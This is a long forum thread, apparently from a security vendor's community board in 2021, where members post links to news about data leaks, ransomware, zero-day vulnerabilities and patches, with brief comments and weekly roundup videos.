https://www.bleepingcomputer.com/news/security/phps-git-server-hacked-to-add-backdoors-to-php-source-code/
https://news-web.php.net/php.internals/113838
-
PHP's Git server hacked to add backdoors to PHP source code
https://www.bleepingcomputer.com/news/security/phps-git-server-hacked-to-add-backdoors-to-php-source-code/ (https://www.bleepingcomputer.com/news/security/phps-git-server-hacked-to-add-backdoors-to-php-source-code/)
https://news-web.php.net/php.internals/113838 (https://news-web.php.net/php.internals/113838)
Is moving to GitHub really the answer since it's also been under attack?
A better question should be is anything safe anymore?
-
533 million Facebook users’ phone numbers leaked on hacker forum
https://www.bleepingcomputer.com/news/security/533-million-facebook-users-phone-numbers-leaked-on-hacker-forum/
-
533 million Facebook users’ phone numbers leaked on hacker forum
https://www.bleepingcomputer.com/news/security/533-million-facebook-users-phone-numbers-leaked-on-hacker-forum/ (https://www.bleepingcomputer.com/news/security/533-million-facebook-users-phone-numbers-leaked-on-hacker-forum/)
This isn't new, it's rehashing 2019 information.
-
533 million Facebook users’ phone numbers leaked on hacker forum
https://www.bleepingcomputer.com/news/security/533-million-facebook-users-phone-numbers-leaked-on-hacker-forum/ (https://www.bleepingcomputer.com/news/security/533-million-facebook-users-phone-numbers-leaked-on-hacker-forum/)
This isn't new, it's rehashing 2019 information.
How to check if your info was exposed in the Facebook data leak
https://www.bleepingcomputer.com/news/security/how-to-check-if-your-info-was-exposed-in-the-facebook-data-leak/
-
533 million Facebook users’ phone numbers leaked on hacker forum
https://www.bleepingcomputer.com/news/security/533-million-facebook-users-phone-numbers-leaked-on-hacker-forum/ (https://www.bleepingcomputer.com/news/security/533-million-facebook-users-phone-numbers-leaked-on-hacker-forum/)
This isn't new, it's rehashing 2019 information.
How to check if your info was exposed in the Facebook data leak
https://www.bleepingcomputer.com/news/security/how-to-check-if-your-info-was-exposed-in-the-facebook-data-leak/ (https://www.bleepingcomputer.com/news/security/how-to-check-if-your-info-was-exposed-in-the-facebook-data-leak/)
Your link isn't working for the following reason.
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/04/05/10/59/crfh6RVnchl/preview.jpg)
This is still 2019 news.
-
533 million Facebook users’ phone numbers leaked on hacker forum
https://www.bleepingcomputer.com/news/security/533-million-facebook-users-phone-numbers-leaked-on-hacker-forum/ (https://www.bleepingcomputer.com/news/security/533-million-facebook-users-phone-numbers-leaked-on-hacker-forum/)
This isn't new, it's rehashing 2019 information.
How to check if your info was exposed in the Facebook data leak
https://www.bleepingcomputer.com/news/security/how-to-check-if-your-info-was-exposed-in-the-facebook-data-leak/
Have I Been Pwned adds search for leaked Facebook phone numbers
https://www.bleepingcomputer.com/news/security/have-i-been-pwned-adds-search-for-leaked-facebook-phone-numbers/
-
533 million Facebook users’ phone numbers leaked on hacker forum
https://www.bleepingcomputer.com/news/security/533-million-facebook-users-phone-numbers-leaked-on-hacker-forum/ (https://www.bleepingcomputer.com/news/security/533-million-facebook-users-phone-numbers-leaked-on-hacker-forum/)
This isn't new, it's rehashing 2019 information.
How to check if your info was exposed in the Facebook data leak
https://www.bleepingcomputer.com/news/security/how-to-check-if-your-info-was-exposed-in-the-facebook-data-leak/
Have I Been Pwned adds search for leaked Facebook phone numbers
https://www.bleepingcomputer.com/news/security/have-i-been-pwned-adds-search-for-leaked-facebook-phone-numbers/
The Facebook data leak: What you should do today
https://blog.avast.com/what-to-do-about-facebook-leak-avast
-
Scraped data of 500 million LinkedIn users being sold online, 2 million records leaked as proof
https://cybernews.com/news/stolen-data-of-500-million-linkedin-users-being-sold-online-2-million-leaked-as-proof-2/
-
Tech support scammers lure victims with fake antivirus billing emails
https://www.bleepingcomputer.com/news/security/tech-support-scammers-lure-victims-with-fake-antivirus-billing-emails/
-
Weekly Security News Roundup w/e 4-9-2021
(https://i9.ytimg.com/vi_webp/S7WAkFNC-tU/mqdefault.webp?time=1618143000000&sqp=CJjOy4MG&rs=AOn4CLBUUxo5K7gVKSft7Yom31BcaKzo_Q)
https://youtu.be/S7WAkFNC-tU
-
Clubhouse data leak: 1.3 million scraped user records leaked online for free
https://cybernews.com/security/clubhouse-data-leak-1-3-million-user-records-leaked-for-free-online/
-
Google Chrome, Microsoft Edge zero-day vulnerability shared on Twitter
https://www.bleepingcomputer.com/news/security/google-chrome-microsoft-edge-zero-day-vulnerability-shared-on-twitter/
-
If Privacy is important to you, this was an excellent episode.
https://blog.avast.com/avast-hacker-archives-episode-5-eva-galperin-avast
-
NSA discovers critical Exchange Server vulnerabilities, patch now
https://www.bleepingcomputer.com/news/security/nsa-discovers-critical-exchange-server-vulnerabilities-patch-now/
-
Passwordstate password manager hacked in supply chain attack
https://www.bleepingcomputer.com/news/security/passwordstate-password-manager-hacked-in-supply-chain-attack/
-
Fake Microsoft DirectX 12 site pushes crypto-stealing malware
https://www.bleepingcomputer.com/news/security/fake-microsoft-directx-12-site-pushes-crypto-stealing-malware/
-
10.000 Word Press sites still vulnerable for an elementor add-on hole.
Core-software with Word Press is often well-maintained.
But it is configuration, settings & add-ons where it can go critically wrong.
Often this affects vulnerable plug-ins.
Re: https://www.shodan.io/search?query=Elementor
and there are even more explicit scan results available.
Alert: elementor 3.1.4 Warning latest release (3.2.1)
-https://elementor.com/
What happens when a hacker can brute force through that particular plug-in path?
A whole lot of genuine cyber-misery.
polonus
-
Hacker leaks 20 million alleged BigBasket user records for free
https://www.bleepingcomputer.com/news/security/hacker-leaks-20-million-alleged-bigbasket-user-records-for-free/
-
https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-store-locator-plus-for-wordpress-open-email-relay-4-2-25/
polonus
-
Your stolen ParkMobile data is now free for wannabe scammers
https://www.bleepingcomputer.com/news/security/your-stolen-parkmobile-data-is-now-free-for-wannabe-scammers/
-
Weekly Security News Roundup w/e 4-30-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/05/03/11/32/crheXxVeJrW/preview.jpg) (https://youtu.be/RIGcJU0O0W8)
https://youtu.be/RIGcJU0O0W8
-
CVE-2021-21551- Hundreds Of Millions Of Dell Computers At Risk Due to Multiple BIOS Driver Privilege Escalation Flaws
https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/
https://gizmodo.com/you-should-definitely-update-your-dell-computer-right-n-1846823763?scrolla=5eb6d68b7fedc32c19ef33b4
https://www.dell.com/support/kbdoc/sv-se/000186019/dsa-2021-088-dell-client-platform-security-update-for-dell-driver-insufficient-access-control-vulnerability
-
US and Australia warn of escalating Avaddon ransomware attacks
https://www.bleepingcomputer.com/news/security/us-and-australia-warn-of-escalating-avaddon-ransomware-attacks/
-
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/05/11/11/07/crhXXiVfDm7/preview.jpg) (https://youtu.be/y50kRNfiWko)
https://youtu.be/y50kRNfiWko
-
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/05/11/11/09/crhXXQVfDHb/preview.jpg) (https://youtu.be/-y119gKNtJE)
https://youtu.be/-y119gKNtJE (https://youtu.be/-y119gKNtJE)
-
WordPress 5.7.2 Security Release
https://wordpress.org/news/2021/05/wordpress-5-7-2-security-release/
-
Security News Roundup for the w/e 5/14/2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/05/14/14/55/crh22NVfUHZ/preview.jpg) (https://youtu.be/EdtuZlJ2-Xk)
https://youtu.be/EdtuZlJ2-Xk (https://youtu.be/EdtuZlJ2-Xk)
-
Weekly Security News Roundup w/e 5-21-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/05/22/13/45/crh3IGVf89D/preview.jpg) (https://youtu.be/jnFdl4tSeEc)
https://youtu.be/jnFdl4tSeEc (https://youtu.be/jnFdl4tSeEc)
-
Weekly Security News Roundup w/e 5-28-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/05/28/23/54/crhu0LVhbor/preview.jpg) (https://youtu.be/L1Ep5o3upmc)
https://youtu.be/L1Ep5o3upmc (https://youtu.be/L1Ep5o3upmc)
-
Watch out: These unsubscribe emails only lead to further spam
https://www.bleepingcomputer.com/news/security/watch-out-these-unsubscribe-emails-only-lead-to-further-spam/
-
Watch out: These unsubscribe emails only lead to further spam
https://www.bleepingcomputer.com/news/security/watch-out-these-unsubscribe-emails-only-lead-to-further-spam/
Guess what, I have even been wary about even using unsubscribe links in regular emails that have unsubscribe links. Frequently these links are by a company sending the emails and not the company that you initially subscribed to. Whilst the email might be legit, I always check out the unsubscribe link before using it. Or I put a block on that email address in MailWasher Pro (MWP) my Anti Spam program, so I don't receive the emails, so there is no confirmation of receipt, e.g. a live email address.
As for unsolicited unsubscribe emails, treated like any other unsolicited emails (SPAM/Scam), deleted by MWP at server level, so they don't even get downloaded.
-
Critical 0-day in Fancy Product Designer Under Active Attack
https://www.wordfence.com/blog/2021/06/critical-0-day-in-fancy-product-designer-under-active-attack/
-
Weekly Security News Roundup w/w 6-4-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/06/04/21/59/cr1frRVhAlI/preview.jpg) (https://youtu.be/EIZTAMMCE2c)
https://youtu.be/EIZTAMMCE2c (https://youtu.be/EIZTAMMCE2c)
-
We do not know what firms have come under attack via a Typer Mismatch Bug,
a zero-day attack, that urged Google to patch their browser JS-engine.
Threat is inherent on using a browser monoculture (Google Chrome/Chromium),
inside another mono-culture, i.e., Windows 10 (latest version)
It was Kaspersky's Boris Larin to report this so-called PuzzleMaker attack.
Re: https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/ (https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/)
JS (JavaScript) will be world's biggest can of code-worms ever for some time to come. :o
polonus
-
IPAS: Security Advisories for June 2021
https://blogs.intel.com/technology/2021/06/intel-security-advisories-for-june-2021/
-
Audi, Volkswagen data breach affects 3.3 million customers
https://www.bleepingcomputer.com/news/security/audi-volkswagen-data-breach-affects-33-million-customers/
-
Audi, Volkswagen data breach affects 3.3 million customers
https://www.bleepingcomputer.com/news/security/audi-volkswagen-data-breach-affects-33-million-customers/ (https://www.bleepingcomputer.com/news/security/audi-volkswagen-data-breach-affects-33-million-customers/)
https://youtu.be/MZViT8dxYJI
-
Weekly Security News Roundup w/e 6-11-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/06/14/12/43/cr12l5VhWKO/preview.jpg) (https://youtu.be/ic8FYwEyGUA)
https://youtu.be/ic8FYwEyGUA (https://youtu.be/ic8FYwEyGUA)
-
Weekly Security News Roundup w/e 6-18-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/06/18/13/17/cr1FIbV1lRi/preview.jpg) (https://youtu.be/XOgjGNGg3qI)
https://youtu.be/XOgjGNGg3qI (https://youtu.be/XOgjGNGg3qI)
-
Scammer arrested for phishing operation, sent 25,000 texts in a day
https://www.bleepingcomputer.com/news/security/scammer-arrested-for-phishing-operation-sent-25-000-texts-in-a-day/
https://www.gmp.police.uk/news/greater-manchester/news/news/2021/june/man-arrested-in-manchester-hotel-after-over-25000-phishing-messages-sent-in-one-day/
-
Dell SupportAssist bugs put over 30 million PCs at risk
https://www.bleepingcomputer.com/news/security/dell-supportassist-bugs-put-over-30-million-pcs-at-risk/
-
Security News Roundup w/e 6-25-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/06/25/15/18/cr1ToFV1wa7/preview.jpg) (https://youtu.be/L0twMUQrMbg)
https://youtu.be/L0twMUQrMbg (https://youtu.be/L0twMUQrMbg)
-
New LinkedIn Data Leak Leaves 700 Million Users Exposed
https://restoreprivacy.com/linkedin-data-leak-700-million-users/
-
Public Windows PrintNightmare 0-day exploit allows domain takeover
https://www.bleepingcomputer.com/news/security/public-windows-printnightmare-0-day-exploit-allows-domain-takeover/
-
Public Windows PrintNightmare 0-day exploit allows domain takeover
https://www.bleepingcomputer.com/news/security/public-windows-printnightmare-0-day-exploit-allows-domain-takeover/
Microsoft shares mitigations for Windows PrintNightmare zero-day bug
https://www.bleepingcomputer.com/news/security/microsoft-shares-mitigations-for-windows-printnightmare-zero-day-bug/
-
Security News Roundup w-e 7-2-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/07/02/14/09/crin2QV1JmV/preview.jpg) (https://youtu.be/FwtgVMOEAzo)
https://youtu.be/FwtgVMOEAzo (https://youtu.be/FwtgVMOEAzo)
-
Public Windows PrintNightmare 0-day exploit allows domain takeover
https://www.bleepingcomputer.com/news/security/public-windows-printnightmare-0-day-exploit-allows-domain-takeover/
Microsoft shares mitigations for Windows PrintNightmare zero-day bug
https://www.bleepingcomputer.com/news/security/microsoft-shares-mitigations-for-windows-printnightmare-zero-day-bug/
Actively exploited PrintNightmare zero-day gets unofficial patch
https://www.bleepingcomputer.com/news/security/actively-exploited-printnightmare-zero-day-gets-unofficial-patch/
https://blog.0patch.com/2021/07/free-micropatches-for-printnightmare.html
-
REvil ransomware attacks systems using Kaseya’s remote IT management software
https://www.theverge.com/2021/7/2/22561252/revil-ransomware-attacks-systems-using-kaseyas-remote-it-management-software
-
REvil ransomware attacks systems using Kaseya’s remote IT management software
https://www.theverge.com/2021/7/2/22561252/revil-ransomware-attacks-systems-using-kaseyas-remote-it-management-software
Rapid Response: Mass MSP Ransomware Incident
https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident
-
REvil ransomware attacks systems using Kaseya’s remote IT management software
https://www.theverge.com/2021/7/2/22561252/revil-ransomware-attacks-systems-using-kaseyas-remote-it-management-software (https://www.theverge.com/2021/7/2/22561252/revil-ransomware-attacks-systems-using-kaseyas-remote-it-management-software)
Rapid Response: Mass MSP Ransomware Incident
https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident (https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident)
https://youtu.be/ov58LCpwg70 (https://youtu.be/ov58LCpwg70)
-
Apple is Improving Privacy Features, but Is It Enough?
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/07/05/13/03/crihIeV1MbQ/preview.jpg) (https://youtu.be/fT6cksdmCQ4)
https://youtu.be/fT6cksdmCQ4 (https://youtu.be/fT6cksdmCQ4)
A closer look at Apple's new privacy features.
-
REvil ransomware attacks systems using Kaseya’s remote IT management software
https://www.theverge.com/2021/7/2/22561252/revil-ransomware-attacks-systems-using-kaseyas-remote-it-management-software (https://www.theverge.com/2021/7/2/22561252/revil-ransomware-attacks-systems-using-kaseyas-remote-it-management-software)
Rapid Response: Mass MSP Ransomware Incident
https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident (https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident)
https://youtu.be/ov58LCpwg70 (https://youtu.be/ov58LCpwg70)
CISA, FBI share guidance for victims of Kaseya ransomware attack
https://www.bleepingcomputer.com/news/security/cisa-fbi-share-guidance-for-victims-of-kaseya-ransomware-attack/
-
Public Windows PrintNightmare 0-day exploit allows domain takeover
https://www.bleepingcomputer.com/news/security/public-windows-printnightmare-0-day-exploit-allows-domain-takeover/
Microsoft shares mitigations for Windows PrintNightmare zero-day bug
https://www.bleepingcomputer.com/news/security/microsoft-shares-mitigations-for-windows-printnightmare-zero-day-bug/
Actively exploited PrintNightmare zero-day gets unofficial patch
https://www.bleepingcomputer.com/news/security/actively-exploited-printnightmare-zero-day-gets-unofficial-patch/
https://blog.0patch.com/2021/07/free-micropatches-for-printnightmare.html
Microsoft pushes emergency update for Windows PrintNightmare zero-day
https://www.bleepingcomputer.com/news/security/microsoft-pushes-emergency-update-for-windows-printnightmare-zero-day/
-
Avast Security News Roundup w/e 7-9-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/07/09/13/30/criQIvVintX/preview.jpg) (https://youtu.be/TRRMAZifXCE)
https://youtu.be/TRRMAZifXCE (https://youtu.be/TRRMAZifXCE)
-
REvil ransomware attacks systems using Kaseya’s remote IT management software
https://www.theverge.com/2021/7/2/22561252/revil-ransomware-attacks-systems-using-kaseyas-remote-it-management-software (https://www.theverge.com/2021/7/2/22561252/revil-ransomware-attacks-systems-using-kaseyas-remote-it-management-software)
Rapid Response: Mass MSP Ransomware Incident
https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident (https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident)
https://youtu.be/ov58LCpwg70 (https://youtu.be/ov58LCpwg70)
CISA, FBI share guidance for victims of Kaseya ransomware attack
https://www.bleepingcomputer.com/news/security/cisa-fbi-share-guidance-for-victims-of-kaseya-ransomware-attack/
Kaseya patches VSA vulnerabilities used in REvil ransomware attack
https://www.bleepingcomputer.com/news/security/kaseya-patches-vsa-vulnerabilities-used-in-revil-ransomware-attack/
-
Microsoft warns of critical PowerShell 7 code execution vulnerability
https://www.bleepingcomputer.com/news/security/microsoft-warns-of-critical-powershell-7-code-execution-vulnerability/
-
Windows print nightmare continues with malicious driver packages
https://www.bleepingcomputer.com/news/microsoft/windows-print-nightmare-continues-with-malicious-driver-packages/
https://www.bleepingcomputer.com/news/microsoft/microsoft-shares-guidance-on-new-windows-print-spooler-vulnerability/
-
uMatrix has an unfixed vulnerability: here is a workaround
https://www.ghacks.net/2021/07/15/umatrix-has-an-unfixed-vulnerability-here-is-a-workaround/
-
uMatrix has an unfixed vulnerability: here is a workaround
https://www.ghacks.net/2021/07/15/umatrix-has-an-unfixed-vulnerability-here-is-a-workaround/ (https://www.ghacks.net/2021/07/15/umatrix-has-an-unfixed-vulnerability-here-is-a-workaround/)
Why not simply use uBlock origin?
-
uMatrix has an unfixed vulnerability: here is a workaround
https://www.ghacks.net/2021/07/15/umatrix-has-an-unfixed-vulnerability-here-is-a-workaround/ (https://www.ghacks.net/2021/07/15/umatrix-has-an-unfixed-vulnerability-here-is-a-workaround/)
Why not simply use uBlock origin?
I do use it, along with uMatrix, they aren't exactly the same.
-
7-16-2021 Weekly Security News Roundup
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/07/16/21/35/criDraVir08/preview.jpg) (https://youtu.be/9ldLN55xo90)
https://youtu.be/9ldLN55xo90 (https://youtu.be/9ldLN55xo90)
-
Word Press forces security update: https://woocommerce.com/posts/critical-vulnerability-detected-july-2021/
This until cybercriminals will have taken over the push request, then we will be in big trouble.
Too many low-grade consumer websites on this PHP-driven CMS i.m.h.o.
polonus (volunteer 3rd party cold reconnaissance website security analsyt and website error-hunter)
-
New Windows 10 vulnerability allows anyone to get admin privileges
https://www.bleepingcomputer.com/news/microsoft/new-windows-10-vulnerability-allows-anyone-to-get-admin-privileges/
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934
-
New Windows 10 vulnerability allows anyone to get admin privileges
https://www.bleepingcomputer.com/news/microsoft/new-windows-10-vulnerability-allows-anyone-to-get-admin-privileges/ (https://www.bleepingcomputer.com/news/microsoft/new-windows-10-vulnerability-allows-anyone-to-get-admin-privileges/)
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934 (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934)
Since MS has already acknowledged the vulnerability, hopefully a patch will follow soon
for any systems affected.
Even without a patch, unless someone gains access to your system, this isn't really a problem. IMHO
-
CISA warns of stealthy malware found on hacked Pulse Secure devices
https://www.bleepingcomputer.com/news/security/cisa-warns-of-stealthy-malware-found-on-hacked-pulse-secure-devices/
https://us-cert.cisa.gov/ncas/current-activity/2021/07/21/malware-targeting-pulse-secure-devices
-
New Windows 10 vulnerability allows anyone to get admin privileges
https://www.bleepingcomputer.com/news/microsoft/new-windows-10-vulnerability-allows-anyone-to-get-admin-privileges/ (https://www.bleepingcomputer.com/news/microsoft/new-windows-10-vulnerability-allows-anyone-to-get-admin-privileges/)
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934 (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934)
Since MS has already acknowledged the vulnerability, hopefully a patch will follow soon
for any systems affected.
Even without a patch, unless someone gains access to your system, this isn't really a problem. IMHO
Microsoft shares workaround for Windows 10 SeriousSAM vulnerability
https://www.bleepingcomputer.com/news/microsoft/microsoft-shares-workaround-for-windows-10-serioussam-vulnerability/
-
Large chunks of the Internet went down to a DNS issue at Akamai CDN to-day.
Re: https://www.engadget.com/playstation-network-down-161951186.html
WEF has warned us we are in for more Internet down time in the foreseeable future.
The Interwebz is under attack, folks, it is not only viruses, ddos, ransomware.
This may effect us all. Better be forearmed by being forewarned.
(Also remember yesterdays interruptions of digital banking in the UK, three major UK banks had downtime).
polonus
-
REvil ransomware attacks systems using Kaseya’s remote IT management software
https://www.theverge.com/2021/7/2/22561252/revil-ransomware-attacks-systems-using-kaseyas-remote-it-management-software (https://www.theverge.com/2021/7/2/22561252/revil-ransomware-attacks-systems-using-kaseyas-remote-it-management-software)
Rapid Response: Mass MSP Ransomware Incident
https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident (https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident)
https://youtu.be/ov58LCpwg70 (https://youtu.be/ov58LCpwg70)
CISA, FBI share guidance for victims of Kaseya ransomware attack
https://www.bleepingcomputer.com/news/security/cisa-fbi-share-guidance-for-victims-of-kaseya-ransomware-attack/
Kaseya patches VSA vulnerabilities used in REvil ransomware attack
https://www.bleepingcomputer.com/news/security/kaseya-patches-vsa-vulnerabilities-used-in-revil-ransomware-attack/
Kaseya obtains universal decryptor for REvil ransomware victims
https://www.bleepingcomputer.com/news/security/kaseya-obtains-universal-decryptor-for-revil-ransomware-victims/
-
Emisoft affirmed the decryption key is universal.
The REvil group now seems as vanished from this planet :)
Maybe a 'deal of sorts' was struck.
polonus
-
Weekly Security News Roundup w/e 7-23-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/07/23/12/41/cri0lpViAEI/preview.jpg) (https://youtu.be/Xju8sx2fwrg)
https://youtu.be/Xju8sx2fwrg (https://youtu.be/Xju8sx2fwrg)
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research. https://www.avast.com/en-us/index#pc
-
Weekly Security News Roundup w/e 7-30-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/07/30/12/17/crivlbViLsv/preview.jpg)
https://youtu.be/fZOiVM3zkmI (https://youtu.be/fZOiVM3zkmI)
Security-related news thanks mostly to Avast Software. I'm just a messenger.
They do most of the challenging work and research.
https://www.avast.com/en-us/index#pc
-
New Windows PrintNightmare zero-days get free unofficial patch
https://www.bleepingcomputer.com/news/microsoft/new-windows-printnightmare-zero-days-get-free-unofficial-patch/
https://blog.0patch.com/2021/08/free-micropatches-for-malicious-printer.html
-
New Windows PrintNightmare zero-days get free unofficial patch
https://www.bleepingcomputer.com/news/microsoft/new-windows-printnightmare-zero-days-get-free-unofficial-patch/ (https://www.bleepingcomputer.com/news/microsoft/new-windows-printnightmare-zero-days-get-free-unofficial-patch/)
https://blog.0patch.com/2021/08/free-micropatches-for-malicious-printer.html (https://blog.0patch.com/2021/08/free-micropatches-for-malicious-printer.html)
I for one am not comfortable allowing a third-party patch which gives that third-party some insight into my systems.
I'll wait till an official patch is released from Microsoft that works without hindering the print process.
-
Weekly Security News Roundup w/e 8-6-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/08/06/11/26/crj1XOVj6eN/preview.jpg) (https://youtu.be/4fS5AoNxkW0)
https://youtu.be/4fS5AoNxkW0 (https://youtu.be/4fS5AoNxkW0)
-
Cyber fraud now targeting professional channels
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/08/10/19/04/crj6qfVjYXu/preview.jpg)
(https://youtu.be/SZLlz2MF0aQ)https://youtu.be/SZLlz2MF0aQ (https://youtu.be/SZLlz2MF0aQ)
Attackers are creating elaborate schemes to steal information and money
through work email and business-related social media channels, like LinkedIn.
-
Hi bob3160,
Thanks for the heads-up. As always very informative.
Yep, also cybercriminals now working from home and this seems a growing trend unfortunately.
Stay safe and secure with avast,
Damian a.k.a. polonus
-
Windows Print Spooler Remote Code Execution Vulnerability
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958
-
Windows Print Spooler Remote Code Execution Vulnerability
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958
Am I going absent minded or what, I'm sure this has happened before, a very old Print Spooler exploit (MS eves off the ball), I guess it is back to haunt us again.
-
Security News Roundup w/e 8-13-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/08/13/13/54/crjIILVjuya/preview.jpg) (https://youtu.be/bsdCgHRkyis)
https://youtu.be/bsdCgHRkyis (https://youtu.be/bsdCgHRkyis)
-
T-Mobile Investigating Claims of Massive Customer Data Breach
https://www.vice.com/en/article/akg8wg/tmobile-investigating-customer-data-breach-100-million
-
T-Mobile Investigating Claims of Massive Customer Data Breach
https://www.vice.com/en/article/akg8wg/tmobile-investigating-customer-data-breach-100-million (https://www.vice.com/en/article/akg8wg/tmobile-investigating-customer-data-breach-100-million)
Another T-Mobile Breach
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/08/17/07/30/crjbivVjzL6/preview.jpg)
https://youtu.be/de5asTU65wY (https://youtu.be/de5asTU65wY)
-
T-Mobile Investigating Claims of Massive Customer Data Breach
https://www.vice.com/en/article/akg8wg/tmobile-investigating-customer-data-breach-100-million (https://www.vice.com/en/article/akg8wg/tmobile-investigating-customer-data-breach-100-million)
Another T-Mobile Breach
https://youtu.be/de5asTU65wY (https://youtu.be/de5asTU65wY)
T‑Mobile Cybersecurity Incident Update
https://www.t-mobile.com/news/network/cybersecurity-incident-update-august-2021
-
T-Mobile Investigating Claims of Massive Customer Data Breach
https://www.vice.com/en/article/akg8wg/tmobile-investigating-customer-data-breach-100-million (https://www.vice.com/en/article/akg8wg/tmobile-investigating-customer-data-breach-100-million)
Another T-Mobile Breach
https://youtu.be/de5asTU65wY (https://youtu.be/de5asTU65wY)
T‑Mobile Cybersecurity Incident Update
https://www.t-mobile.com/news/network/cybersecurity-incident-update-august-2021
T‑Mobile Shares Additional Information Regarding Ongoing Cyberattack Investigation
https://www.t-mobile.com/news/network/additional-information-regarding-2021-cyberattack-investigation
-
Security News Roundup for the w/e 8/20/2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/08/20/11/58/crjYX9VjHWW/preview.jpg)
https://youtu.be/GM2JeZdV3Y0 (https://youtu.be/GM2JeZdV3Y0)
-
8-21-2021 Security News Flash
Another breach. This time it could affects 70 Million AT&T customers.
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/08/21/13/41/crjrIpVjKmd/preview.jpg)
https://youtu.be/1-gEAjyk3Z0 (https://youtu.be/1-gEAjyk3Z0)
-
News Flash Update - T-Mobile Breach
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/08/21/21/21/crjrrrVj73l/preview.jpg)
https://youtu.be/8esXCJi26yc (https://youtu.be/8esXCJi26yc)
Some sound advice you should follow if you're affected by the breach.
Many customers are.
-
LinkedIn - Job offers may be phishing scams.
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/08/22/12/52/crj3lsVjsIv/preview.jpg)
https://youtu.be/D4CmeIJJZ7w (https://youtu.be/D4CmeIJJZ7w)
Be careful when you reply to a job offer on LinkedIn it may be a scam.
-
Home Title Fraud - What is it?
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/08/22/18/19/crj3FqVjsCX/preview.jpg)
https://youtu.be/ryt64OGP3nQ (https://youtu.be/ryt64OGP3nQ)
It's your home but, is your name still on the deed?
-
Razer bug lets you become a Windows 10 admin by plugging in a mouse
https://www.bleepingcomputer.com/news/security/razer-bug-lets-you-become-a-windows-10-admin-by-plugging-in-a-mouse/
-
Razer bug lets you become a Windows 10 admin by plugging in a mouse
https://www.bleepingcomputer.com/news/security/razer-bug-lets-you-become-a-windows-10-admin-by-plugging-in-a-mouse/ (https://www.bleepingcomputer.com/news/security/razer-bug-lets-you-become-a-windows-10-admin-by-plugging-in-a-mouse/)
I recently purchased and am using their mouse and keyboard on one of my systems.
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/08/23/11/35/crj0XaVjL55/preview.jpg)
-
Weekly Security News Roundup w/e 8-27-2021
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/08/27/13/48/crjtIJVQj2Q/preview.jpg)
https://youtu.be/CdhAxm3qJTk (https://youtu.be/CdhAxm3qJTk)
-
T-Mobile Investigating Claims of Massive Customer Data Breach
https://www.vice.com/en/article/akg8wg/tmobile-investigating-customer-data-breach-100-million (https://www.vice.com/en/article/akg8wg/tmobile-investigating-customer-data-breach-100-million)
Another T-Mobile Breach
https://youtu.be/de5asTU65wY (https://youtu.be/de5asTU65wY)
T‑Mobile Cybersecurity Incident Update
https://www.t-mobile.com/news/network/cybersecurity-incident-update-august-2021
T‑Mobile Shares Additional Information Regarding Ongoing Cyberattack Investigation
https://www.t-mobile.com/news/network/additional-information-regarding-2021-cyberattack-investigation
T-Mobile CEO: Hacker brute-forced his way through our network
https://www.bleepingcomputer.com/news/security/t-mobile-ceo-hacker-brute-forced-his-way-through-our-network/
-
What does Apple know about you?
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/08/28/15/04/crjuofVQ6Kk/preview.jpg)
https://youtu.be/sholahWkBlQ (https://youtu.be/sholahWkBlQ)
In this world of data collection and processing, Apple takes the lead on privacy.
Thanks to Emma McGowan for her excellent article on this topic.
https://blog.avast.com/what-apple-knows-about-you-avast
-
Scammers who stole millions from elders indicted
(https://d1ka0itfguscri.cloudfront.net/Lh/2021/08/29/19/03/crjUqeVQlEm/preview.jpg)
https://youtu.be/Hv-qAJ9D7SA (https://youtu.be/Hv-qAJ9D7SA)
If you're interested in how I handled this scam when it was perpetrated on me
back in 2015, take a look at the following article.
